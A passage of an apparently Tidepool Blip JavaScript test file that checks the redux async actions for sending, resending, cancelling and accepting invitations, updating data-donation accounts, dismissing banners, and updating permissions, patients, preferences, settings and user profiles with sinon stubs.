already been sent to the e-mail', () => { let email = '<EMAIL>'; let permissions = { view: true }; const error = { status: 409, body: 'Error!' }; let api = { invitation: { send: sinon.stub().callsArgWith(2, error) } }; let err = new Error(ErrorMessages.ERR_ALREADY_SENT_TO_EMAIL); err.status = 409; let expectedActions = [ { type: 'SEND_INVITE_REQUEST' }, { type: 'SEND_INVITE_FAILURE', error: err, meta: { apiError: {status: 409, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); const callback = sinon.stub(); store.dispatch(async.sendInvite(api, email, permissions, callback)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_ALREADY_SENT_TO_EMAIL }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.invitation.send.calledWith(email, permissions)).to.be.true; // assert callback contains the error sinon.assert.calledOnce(callback); sinon.assert.calledWithExactly(callback, error, undefined); }); it('should trigger SEND_INVITE_FAILURE and it should call api.invitation.send and callback once with error for a failed request', () => { let email = '<EMAIL>'; let permissions = { view: true }; let invitation = { foo: 'bar' }; const error = { status: 500, body: 'Error!' }; let api = { invitation: { send: sinon.stub().callsArgWith(2, error) } }; let err = new Error(ErrorMessages.ERR_SENDING_INVITE); err.status = 500; let expectedActions = [ { type: 'SEND_INVITE_REQUEST' }, { type: 'SEND_INVITE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); const callback = sinon.stub(); store.dispatch(async.sendInvite(api, email, permissions, callback)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_SENDING_INVITE }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.invitation.send.calledWith(email, permissions)).to.be.true; // assert callback contains the error sinon.assert.calledOnce(callback); sinon.assert.calledWithExactly(callback, error, undefined); }); }); describe('resendInvite', () => { it('should trigger RESEND_INVITE_SUCCESS and it should call api.invitation.resend and callback once for a successful request', () => { let inviteId = 'inviteId'; let invite = { foo: 'bar' }; let api = { invitation: { resend: sinon.stub().callsArgWith(1, null, invite) } }; let expectedActions = [ { type: 'RESEND_INVITE_REQUEST' }, { type: 'RESEND_INVITE_SUCCESS', payload: { invite: invite, removedInviteId: inviteId } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.resendInvite(api, inviteId)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.invitation.resend.calledWith(inviteId)).to.be.true; }); it('should trigger RESEND_INVITE_FAILURE and it should call api.invitation.resend and callback once with error for a failed request', () => { let inviteId = 'inviteId'; const error = { status: 500, body: 'Error!' }; let api = { invitation: { resend: sinon.stub().callsArgWith(1, error) } }; let err = new Error(ErrorMessages.ERR_RESENDING_INVITE); err.status = 500; let expectedActions = [ { type: 'RESEND_INVITE_REQUEST' }, { type: 'RESEND_INVITE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); const callback = sinon.stub(); store.dispatch(async.resendInvite(api, inviteId)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_RESENDING_INVITE }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.invitation.resend.calledWith(inviteId)).to.be.true; }); }); describe('cancelSentInvite', () => { it('should trigger CANCEL_SENT_INVITE_SUCCESS and it should call api.invitation.cancel and callback once for a successful request', () => { let email = '<EMAIL>'; let api = { invitation: { cancel: sinon.stub().callsArgWith(1, null) } }; let expectedActions = [ { type: 'CANCEL_SENT_INVITE_REQUEST' }, { type: 'CANCEL_SENT_INVITE_SUCCESS', payload: { removedEmail: email } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); const callback = sinon.stub(); store.dispatch(async.cancelSentInvite(api, email, callback)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.invitation.cancel.calledWith(email)).to.be.true; // assert callback contains no error, and the email sinon.assert.calledOnce(callback); sinon.assert.calledWithExactly(callback, null, email); }); it('should trigger CANCEL_SENT_INVITE_FAILURE and it should call api.invitation.send and callback once with error for a failed request', () => { let email = '<EMAIL>'; const error = { status: 500, body: 'Error!' }; let api = { invitation: { cancel: sinon.stub().callsArgWith(1, error) } }; let err = new Error(ErrorMessages.ERR_CANCELLING_INVITE); err.status = 500; let expectedActions = [ { type: 'CANCEL_SENT_INVITE_REQUEST' }, { type: 'CANCEL_SENT_INVITE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); const callback = sinon.stub(); store.dispatch(async.cancelSentInvite(api, email, callback)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_CANCELLING_INVITE }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.invitation.cancel.calledWith(email)).to.be.true; // assert callback contains the error sinon.assert.calledOnce(callback); sinon.assert.calledWithExactly(callback, error, email); }); }); describe('updateDataDonationAccounts', () => { it('should trigger UPDATE_DATA_DONATION_ACCOUNTS_SUCCESS and it should add and remove accounts for a successful request', () => { let addAccounts = [ TIDEPOOL_DATA_DONATION_ACCOUNT_EMAIL, ]; let removeAccounts = [ { email: '<EMAIL>' }, ]; let api = { invitation: { send: sinon.stub().callsArgWith(2, null, { email: TIDEPOOL_DATA_DONATION_ACCOUNT_EMAIL }), cancel: sinon.stub().callsArgWith(1, null, { removedEmail: '<EMAIL>' }), getSent: sinon.stub(), } }; let expectedActions = [ { type: 'UPDATE_DATA_DONATION_ACCOUNTS_REQUEST' }, { type: 'SEND_INVITE_REQUEST'}, { type: 'FETCH_PENDING_SENT_INVITES_REQUEST'}, { type: 'SEND_INVITE_SUCCESS', payload: { invite: { email: TIDEPOOL_DATA_DONATION_ACCOUNT_EMAIL } } }, { type: 'CANCEL_SENT_INVITE_REQUEST' }, { type: 'CANCEL_SENT_INVITE_SUCCESS', payload: { removedEmail: '<EMAIL>' } }, { type: 'UPDATE_DATA_DONATION_ACCOUNTS_SUCCESS', payload: { dataDonationAccounts: { addAccounts: _.map(addAccounts, email => ({ email: email })), removeAccounts: _.map(removeAccounts, account => account.email), }}} ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore(_.assign({}, initialState, { blip: { loggedInUserId: 1234 }, })); store.dispatch(async.updateDataDonationAccounts(api, addAccounts, removeAccounts)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); }); it('should trigger UPDATE_DATA_DONATION_ACCOUNTS_FAILURE and it should call error once for a failed add account request', () => { let addAccounts = [ TIDEPOOL_DATA_DONATION_ACCOUNT_EMAIL, ]; let removeAccounts = [ { email: '<EMAIL>' }, ]; let err = new Error(ErrorMessages.ERR_UPDATING_DATA_DONATION_ACCOUNTS); err.status = 500; let sendErr = new Error(ErrorMessages.ERR_SENDING_INVITE); sendErr.status = 500; let api = { invitation: { send: sinon.stub().callsArgWith(2, { status: 500, body: 'Error!' } , null), cancel: sinon.stub().callsArgWith(1, null, { removedEmail: '<EMAIL>' }), getSent: sinon.stub(), } }; let expectedActions = [ { type: 'UPDATE_DATA_DONATION_ACCOUNTS_REQUEST' }, { type: 'SEND_INVITE_REQUEST' }, { type: 'SEND_INVITE_FAILURE', error: sendErr, meta: { apiError: { status: 500, body: 'Error!' } } }, { type: 'CANCEL_SENT_INVITE_REQUEST' }, { type: 'CANCEL_SENT_INVITE_SUCCESS', payload: { removedEmail: '<EMAIL>' } }, { type: 'UPDATE_DATA_DONATION_ACCOUNTS_FAILURE', error: err, meta: { apiError: { status: 500, body: 'Error!' } } }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore(_.assign({}, initialState, { blip: { loggedInUserId: 1234 }, })); store.dispatch(async.updateDataDonationAccounts(api, addAccounts, removeAccounts)); const actions = store.getActions(); expect(actions[2].error).to.deep.include({ message: ErrorMessages.ERR_SENDING_INVITE }); expectedActions[2].error = actions[2].error; expect(actions[5].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_DATA_DONATION_ACCOUNTS }); expectedActions[5].error = actions[5].error; expect(actions).to.eql(expectedActions); }); }); describe('dismissDonateBanner', () => { it('should trigger DISMISS_BANNER and it should call updatePreferences once for a successful request', () => { let preferences = { dismissedDonateYourDataBannerTime: '2017-11-28T00:00:00.000Z' }; let patient = { id: 500, name: '<NAME>', age: 65 }; let api = { metadata: { preferences: { put: sinon.stub().callsArgWith(2, null, preferences), }, }, patient: { get: sinon.stub().callsArgWith(1, null, patient) } }; let expectedActions = [ { type: 'DISMISS_BANNER', payload: { type: 'donate' } }, { type: 'UPDATE_PREFERENCES_REQUEST' }, { type: 'UPDATE_PREFERENCES_SUCCESS', payload: { updatedPreferences: { dismissedDonateYourDataBannerTime: preferences.dismissedDonateYourDataBannerTime, } } }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.dismissDonateBanner(api, patient.id)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); }); }); describe('dismissDexcomConnectBanner', () => { it('should trigger DISMISS_BANNER and it should call updatePreferences once for a successful request', () => { let preferences = { dismissedDexcomConnectBannerTime: '2017-11-28T00:00:00.000Z' }; let patient = { id: 500, name: '<NAME>', age: 65 }; let api = { metadata: { preferences: { put: sinon.stub().callsArgWith(2, null, preferences), }, }, patient: { get: sinon.stub().callsArgWith(1, null, patient) } }; let expectedActions = [ { type: 'DISMISS_BANNER', payload: { type: 'dexcom' } }, { type: 'UPDATE_PREFERENCES_REQUEST' }, { type: 'UPDATE_PREFERENCES_SUCCESS', payload: { updatedPreferences: { dismissedDexcomConnectBannerTime: preferences.dismissedDexcomConnectBannerTime, } } }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.dismissDexcomConnectBanner(api, patient.id)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); }); }); describe('clickDexcomConnectBanner', () => { it('should trigger DISMISS_BANNER and it should call updatePreferences once for a successful request', () => { let preferences = { clickedDexcomConnectBannerTime: '2017-11-28T00:00:00.000Z' }; let patient = { id: 500, name: '<NAME>', age: 65 }; let api = { metadata: { preferences: { put: sinon.stub().callsArgWith(2, null, preferences), }, }, patient: { get: sinon.stub().callsArgWith(1, null, patient) } }; let expectedActions = [ { type: 'DISMISS_BANNER', payload: { type: 'dexcom' } }, { type: 'UPDATE_PREFERENCES_REQUEST' }, { type: 'UPDATE_PREFERENCES_SUCCESS', payload: { updatedPreferences: { clickedDexcomConnectBannerTime: preferences.clickedDexcomConnectBannerTime, } } }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.clickDexcomConnectBanner(api, patient.id)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); }); }); describe('dismissShareDataBanner', () => { it('should trigger DISMISS_BANNER and it should call updatePreferences once for a successful request', () => { let preferences = { dismissedShareDataBannerTime: '2017-11-28T00:00:00.000Z' }; let patient = { id: 500, name: '<NAME>', age: 65 }; let api = { metadata: { preferences: { put: sinon.stub().callsArgWith(2, null, preferences), }, }, patient: { get: sinon.stub().callsArgWith(1, null, patient) } }; let expectedActions = [ { type: 'DISMISS_BANNER', payload: { type: 'sharedata' } }, { type: 'UPDATE_PREFERENCES_REQUEST' }, { type: 'UPDATE_PREFERENCES_SUCCESS', payload: { updatedPreferences: { dismissedShareDataBannerTime: preferences.dismissedShareDataBannerTime, } } }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.dismissShareDataBanner(api, patient.id)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); }); }); describe('clickShareDataBanner', () => { it('should trigger DISMISS_BANNER and it should call updatePreferences once for a successful request', () => { let preferences = { clickedShareDataBannerTime: '2017-11-28T00:00:00.000Z' }; let patient = { id: 500, name: '<NAME>', age: 65 }; let api = { metadata: { preferences: { put: sinon.stub().callsArgWith(2, null, preferences), }, }, patient: { get: sinon.stub().callsArgWith(1, null, patient) } }; let expectedActions = [ { type: 'DISMISS_BANNER', payload: { type: 'sharedata' } }, { type: 'UPDATE_PREFERENCES_REQUEST' }, { type: 'UPDATE_PREFERENCES_SUCCESS', payload: { updatedPreferences: { clickedShareDataBannerTime: preferences.clickedShareDataBannerTime, } } }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.clickShareDataBanner(api, patient.id)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); }); }); describe('acceptReceivedInvite', () => { it('should trigger ACCEPT_RECEIVED_INVITE_SUCCESS and it should call acceptReceivedInvite once for a successful request', () => { let invitation = { key: 'foo', creator: { userid: 500 } }; let patient = { id: 500, name: '<NAME>', age: 65 }; let api = { invitation: { accept: sinon.stub().callsArgWith(2, null, invitation) }, patient: { get: sinon.stub().callsArgWith(1, null, patient) } }; let expectedActions = [ { type: 'ACCEPT_RECEIVED_INVITE_REQUEST', payload: { acceptedReceivedInvite: invitation } }, { type: 'ACCEPT_RECEIVED_INVITE_SUCCESS', payload: { acceptedReceivedInvite: invitation } }, { type: 'FETCH_PATIENT_REQUEST' }, { type: 'FETCH_PATIENT_SUCCESS', payload: { patient : patient } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.acceptReceivedInvite(api, invitation)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.invitation.accept.calledWith(invitation.key, invitation.creator.userid)).to.be.true; expect(api.patient.get.calledWith(invitation.creator.userid)).to.be.true; }); it('should trigger ACCEPT_RECEIVED_INVITE_FAILURE and it should call acceptReceivedInvite once for a failed request', () => { let invitation = { key: 'foo', creator: { id: 500 } }; let api = { invitation: { accept: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}) } }; let err = new Error(ErrorMessages.ERR_ACCEPTING_INVITE); err.status = 500; let expectedActions = [ { type: 'ACCEPT_RECEIVED_INVITE_REQUEST', payload: { acceptedReceivedInvite: invitation } }, { type: 'ACCEPT_RECEIVED_INVITE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.acceptReceivedInvite(api, invitation)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_ACCEPTING_INVITE }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.invitation.accept.calledWith(invitation.key, invitation.creator.userid)).to.be.true; }); }); describe('rejectReceivedInvite', () => { it('should trigger REJECT_RECEIVED_INVITE_SUCCESS and it should call rejectReceivedInvite once for a successful request', () => { let invitation = { key: 'foo', creator: { userid: 500 } }; let api = { invitation: { dismiss: sinon.stub().callsArgWith(2, null, invitation) } }; let expectedActions = [ { type: 'REJECT_RECEIVED_INVITE_REQUEST', payload: { rejectedReceivedInvite: invitation } }, { type: 'REJECT_RECEIVED_INVITE_SUCCESS', payload: { rejectedReceivedInvite: invitation } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.rejectReceivedInvite(api, invitation)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.invitation.dismiss.calledWith(invitation.key, invitation.creator.userid)).to.be.true; }); it('should trigger REJECT_RECEIVED_INVITE_FAILURE and it should call rejectReceivedInvite once for a failed request', () => { let invitation = { key: 'foo', creator: { id: 500 } }; let api = { invitation: { dismiss: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}) } }; let err = new Error(ErrorMessages.ERR_REJECTING_INVITE); err.status = 500; let expectedActions = [ { type: 'REJECT_RECEIVED_INVITE_REQUEST', payload: { rejectedReceivedInvite: invitation } }, { type: 'REJECT_RECEIVED_INVITE_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.rejectReceivedInvite(api, invitation)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_REJECTING_INVITE }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.invitation.dismiss.calledWith(invitation.key, invitation.creator.userid)).to.be.true; }); }); describe('setMemberPermissions', () => { it('should trigger SET_MEMBER_PERMISSIONS_SUCCESS and it should call setMemberPermissions once for a successful request', () => { let patientId = 50; let patient = { id: 50, name: '<NAME>' }; let memberId = 2; let permissions = { read: false }; let api = { access: { setMemberPermissions: sinon.stub().callsArgWith(2, null) }, patient: { get: sinon.stub().callsArgWith(1, null, patient) } }; let expectedActions = [ { type: 'SET_MEMBER_PERMISSIONS_REQUEST' }, { type: 'SET_MEMBER_PERMISSIONS_SUCCESS', payload: { memberId: memberId, permissions: permissions } }, { type: 'FETCH_PATIENT_REQUEST' }, { type: 'FETCH_PATIENT_SUCCESS', payload: { patient: patient } }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.setMemberPermissions(api, patientId, memberId, permissions)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.access.setMemberPermissions.calledWith(memberId, permissions)).to.be.true; expect(api.patient.get.calledWith(patientId)).to.be.true; }); it('should trigger SET_MEMBER_PERMISSIONS_FAILURE and it should call setMemberPermissions once for a failed request', () => { let patientId = 50; let memberId = 2; let permissions = { read: false }; let api = { access: { setMemberPermissions: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}) } }; let err = new Error(ErrorMessages.ERR_CHANGING_PERMS); err.status = 500; let expectedActions = [ { type: 'SET_MEMBER_PERMISSIONS_REQUEST' }, { type: 'SET_MEMBER_PERMISSIONS_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.setMemberPermissions(api, patientId, memberId, permissions)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_CHANGING_PERMS }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.access.setMemberPermissions.calledWith(memberId, permissions)).to.be.true; }); }); describe('updatePatient', () => { it('should trigger UPDATE_PATIENT_SUCCESS and it should call updatePatient once for a successful request', () => { let patient = { name: 'Bruce' }; let api = { patient: { put: sinon.stub().callsArgWith(1, null, patient) } }; let expectedActions = [ { type: 'UPDATE_PATIENT_REQUEST' }, { type: 'UPDATE_PATIENT_SUCCESS', payload: { updatedPatient: patient } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updatePatient(api, patient)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.patient.put.calledWith(patient)).to.be.true; expect(trackMetric.calledWith('Updated Profile')).to.be.true; }); it('should trigger UPDATE_PATIENT_FAILURE and it should call updatePatient once for a failed request', () => { let patient = { name: 'Bruce' }; let api = { patient: { put: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}) } }; let err = new Error(ErrorMessages.ERR_UPDATING_PATIENT); err.status = 500; let expectedActions = [ { type: 'UPDATE_PATIENT_REQUEST' }, { type: 'UPDATE_PATIENT_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updatePatient(api, patient)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_PATIENT }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.patient.put.calledWith(patient)).to.be.true; }); }); describe('updatePreferences', () => { it('should trigger UPDATE_PREFERENCES_SUCCESS and it should call updatePreferences once for a successful request', () => { let patientId = 1234; let preferences = { display: 'all' }; let api = { metadata: { preferences: { put: sinon.stub().callsArgWith(2, null, preferences) } } }; let expectedActions = [ { type: 'UPDATE_PREFERENCES_REQUEST' }, { type: 'UPDATE_PREFERENCES_SUCCESS', payload: { updatedPreferences: preferences } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updatePreferences(api, patientId, preferences)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.metadata.preferences.put.calledWith(patientId, preferences)).to.be.true; }); it('should trigger UPDATE_PREFERENCES_FAILURE and it should call updatePreferences once for a failed request', () => { let patientId = 1234; let preferences = { display: 'all' }; let api = { metadata: { preferences: { put: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}) } } }; let err = new Error(ErrorMessages.ERR_UPDATING_PREFERENCES); err.status = 500; let expectedActions = [ { type: 'UPDATE_PREFERENCES_REQUEST' }, { type: 'UPDATE_PREFERENCES_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updatePreferences(api, patientId, preferences)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_PREFERENCES }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.metadata.preferences.put.calledWith(patientId, preferences)).to.be.true; }); }); describe('updateSettings', () => { it('should trigger UPDATE_SETTINGS_SUCCESS and it should call updateSettings once for a successful request', () => { let patientId = 1234; let settings = { siteChangeSource: 'cannulaPrime' }; let api = { metadata: { settings: { put: sinon.stub().callsArgWith(2, null, settings) } } }; let expectedActions = [ { type: 'UPDATE_SETTINGS_REQUEST' }, { type: 'UPDATE_SETTINGS_SUCCESS', payload: { userId: patientId, updatedSettings: settings } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updateSettings(api, patientId, settings)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.metadata.settings.put.calledWith(patientId, settings)).to.be.true; }); it('should trigger UPDATE_PATIENT_BG_UNITS_REQUEST when bg units are being updated', () => { let patientId = 1234; let settings = { units: { bg: MMOLL_UNITS} }; let api = { metadata: { settings: { put: sinon.stub().callsArgWith(2, null, settings) } } }; let expectedActions = [ { type: 'UPDATE_SETTINGS_REQUEST' }, { type: 'UPDATE_PATIENT_BG_UNITS_REQUEST' }, { type: 'UPDATE_SETTINGS_SUCCESS', payload: { userId: patientId, updatedSettings: settings } }, { type: 'UPDATE_PATIENT_BG_UNITS_SUCCESS', payload: { userId: patientId, updatedSettings: settings } }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updateSettings(api, patientId, settings)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.metadata.settings.put.calledWith(patientId, settings)).to.be.true; }); it('should trigger UPDATE_SETTINGS_FAILURE and it should call updateSettings once for a failed request', () => { let patientId = 1234; let settings = { siteChangeSource: 'cannulaPrime' }; let api = { metadata: { settings: { put: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}) } } }; let err = new Error(ErrorMessages.ERR_UPDATING_SETTINGS); err.status = 500; let expectedActions = [ { type: 'UPDATE_SETTINGS_REQUEST' }, { type: 'UPDATE_SETTINGS_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updateSettings(api, patientId, settings)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_SETTINGS }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.metadata.settings.put.calledWith(patientId, settings)).to.be.true; }); it('should trigger UPDATE_PATIENT_BG_UNITS_FAILURE and it should call updateSettings once for a failed request', () => { let patientId = 1234; let settings = { units: { bg: MMOLL_UNITS} }; let api = { metadata: { settings: { put: sinon.stub().callsArgWith(2, {status: 500, body: 'Error!'}) } } }; let err = new Error(ErrorMessages.ERR_UPDATING_SETTINGS); err.status = 500; let bgErr = new Error(ErrorMessages.ERR_UPDATING_PATIENT_BG_UNITS); bgErr.status = 500; let expectedActions = [ { type: 'UPDATE_SETTINGS_REQUEST' }, { type: 'UPDATE_PATIENT_BG_UNITS_REQUEST' }, { type: 'UPDATE_SETTINGS_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'} } }, { type: 'UPDATE_PATIENT_BG_UNITS_FAILURE', error: bgErr, meta: { apiError: {status: 500, body: 'Error!'} } }, ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip: initialState }); store.dispatch(async.updateSettings(api, patientId, settings)); const actions = store.getActions(); expect(actions[2].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_SETTINGS }); expectedActions[2].error = actions[2].error; expect(actions[3].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_PATIENT_BG_UNITS }); expectedActions[3].error = actions[3].error; expect(actions).to.eql(expectedActions); expect(api.metadata.settings.put.calledWith(patientId, settings)).to.be.true; }); }); describe('updateUser', () => { it('should trigger UPDATE_USER_SUCCESS and it should call updateUser once for a successful request', () => { let loggedInUserId = 400; let currentUser = { profile: { name: '<NAME>', age: 29 }, password: '<PASSWORD>', emails: [ '<EMAIL>' ], username: 'Joe' }; let formValues = { profile: { name: '<NAME>', age: 30 }, }; let updatingUser = { profile: { name: '<NAME>', age: 30 }, preferences: {}, emails: [ '<EMAIL>' ], username: 'Joe' }; let userUpdates = { profile: { name: '<NAME>', age: 30 }, preferences: {}, password: '<PASSWORD>' }; let updatedUser = { profile: { name: '<NAME>', age: 30 }, emails: [ '<EMAIL>' ], username: 'Joe', password: '<PASSWORD>' }; let api = { user: { put: sinon.stub().callsArgWith(1, null, updatedUser) } }; let initialStateForTest = _.merge({}, initialState, { allUsersMap: { [loggedInUserId] : currentUser }, loggedInUserId: loggedInUserId }); let expectedActions = [ { type: 'UPDATE_USER_REQUEST', payload: { userId: loggedInUserId, updatingUser: updatingUser} }, { type: 'UPDATE_USER_SUCCESS', payload: { userId: loggedInUserId, updatedUser: updatedUser } } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip : initialStateForTest }); store.dispatch(async.updateUser(api, formValues)); const actions = store.getActions(); expect(actions).to.eql(expectedActions); expect(api.user.put.calledWith(userUpdates)).to.be.true; expect(trackMetric.calledWith('Updated Account')).to.be.true; }); it('should trigger UPDATE_USER_FAILURE and it should call updateUser once for a failed request', () => { let loggedInUserId = 400; let currentUser = { profile: { name: '<NAME>', age: 29 }, password: '<PASSWORD>', emails: [ '<EMAIL>' ], username: 'Joe' }; let formValues = { profile: { name: '<NAME>', age: 30 } }; let updatingUser = { profile: { name: '<NAME>', age: 30 }, preferences: {}, emails: [ '<EMAIL>' ], username: 'Joe' }; let userUpdates = { profile: { name: '<NAME>', age: 30 }, preferences: {}, password: '<PASSWORD>' }; let api = { user: { put: sinon.stub().callsArgWith(1, {status: 500, body: 'Error!'}) } }; let err = new Error(ErrorMessages.ERR_UPDATING_USER); err.status = 500; let initialStateForTest = _.merge({}, initialState, { allUsersMap: { [loggedInUserId] : currentUser }, loggedInUserId: loggedInUserId }); let expectedActions = [ { type: 'UPDATE_USER_REQUEST', payload: { userId: loggedInUserId, updatingUser: updatingUser} }, { type: 'UPDATE_USER_FAILURE', error: err, meta: { apiError: {status: 500, body: 'Error!'}} } ]; _.each(expectedActions, (action) => { expect(isTSA(action)).to.be.true; }); let store = mockStore({ blip : initialStateForTest }); store.dispatch(async.updateUser(api, formValues)); const actions = store.getActions(); expect(actions[1].error).to.deep.include({ message: ErrorMessages.ERR_UPDATING_USER }); expectedActions[1].error = actions[1].error; expect(actions).to.eql(expectedActions); expect(api.user.put.calledWith(userUpdates)).to.be.true; }); }); describe('updateClinicianProfile', () => { it('should trigger UPDATE_USER_SUCCESS and it should call updateClinicianProfile once for a successful request and route user to patients view', () => { let loggedInUserId = 400; let currentUser = { profile: { name: '<NAME>', age: 29 }, password: '<PASSWORD>', emails: [ '<EMAIL>' ], username: 'Joe' }; let formValues = { profile: { name: '<NAME>', age: 30 }, }; let updatingUser = { profile: { name: '<NAME>', age: 30 }, emails: [ '<EMAIL>' ], username: 'Joe' }; let userUpdates = { profile: { name: '<NAME>', age: 30 }, password: '<PASSWORD>' }; let updatedUser = { profile: { name: '<NAME>', age: 30 }, emails: [ '<EMAIL>' ], username: 'Joe', password: '<PASSWORD>' }; let api = { user: { put: sinon.stub().callsArgWith(1, null, updatedUser) } }; let initialStateForTest = _.merge({}, initialState, { allUsersMap: { [loggedInUserId] : currentUser }, loggedInUserId: loggedInUserId }); let expectedActions = [ { type: 'UPDATE_USER_REQUEST', payload: { userId: loggedInUserId, updatingUser: updatingUser} }, { type: 'UPDATE_USER_SUCCESS', payload: { userId: loggedInUserId, updatedUser: updatedUser } }, { type: '@@router/CALL_HISTORY_METHOD', payload: { args: [ '/patients?justLoggedIn=true' ], method: 'push' } } ]; _.each(expectedActions, (action) => { 